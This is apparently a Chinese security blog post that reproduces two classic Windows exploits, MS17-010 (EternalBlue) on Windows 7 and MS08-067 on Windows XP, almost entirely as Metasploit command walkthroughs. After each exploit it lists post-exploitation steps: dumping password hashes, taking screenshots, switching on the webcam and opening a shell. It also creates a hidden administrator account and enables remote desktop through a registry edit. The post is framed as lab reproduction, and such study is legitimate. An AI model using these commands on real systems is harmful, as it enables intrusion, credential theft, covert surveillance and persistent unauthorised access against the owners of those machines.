WINDOWS经典漏洞复现
WINDOWS经典漏洞复现
懒得放图了o.O
ms17-010 永恒之蓝
被攻击机版本为win7
信息收集
nmap扫描发现445端口开放,可尝试利用永恒之蓝进行攻击
也就是利用445端口的smb服务实现操作溢出漏洞
利用
启动msf
msfconsole
查找漏洞模块
search 17-010
探测是否存在漏洞
use 3
选项3为漏洞检测payload
攻击
use 0
选项1为漏洞攻击payload
检测和攻击时记得设置被攻击机的IP:
set rhost 192.168.xxx.xxx
显示主机系统信息
sysinfo
获取屏幕快照
screenshot
文件传输
上传文件:
upload /root/1.txt c:\\
下载文件:
download c:\\2.jpg /root/2.jpg
查看权限:
getuid
获取用户名密码:
run windows/gather/smart_hashdump
摄像头
查看是否存在摄像头
webcam_list
打开摄像头
webcam_strean
getshell
直接进入window的命令行
shell
ms08-067 (CVE-2008-4250) 远程命令执行
MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的
详细原理如下https://www.freebuf.com/vuls/203881.html
被攻击机版本为winxp
信息收集
nmap扫描发现445端口开放,可尝试进行RCE
利用漏洞获取权限
msf启动
msfconsole
查找漏洞模块
search 08-067
调用模块
use 0
查看需要填写的参数
show options
填写参数
set rhost 192.168.xxx.xxx
开始攻击
run
提权
进入命令行
shell
创建高权限用户
net user admin pass /add && net localgroup administrators admin /add
创建名为admin密码为pass的用户,并提升为管理员权限
远程登录
打开windows远程登录端口,默认3389
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
检查端口是否开启
netstat -an
kali再开一个终端进行远程登录
rdesktop 192.168.xxx.xxx:3389
输入新建的admin和pass即可
关闭3389端口:
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Yuy0ung's blog!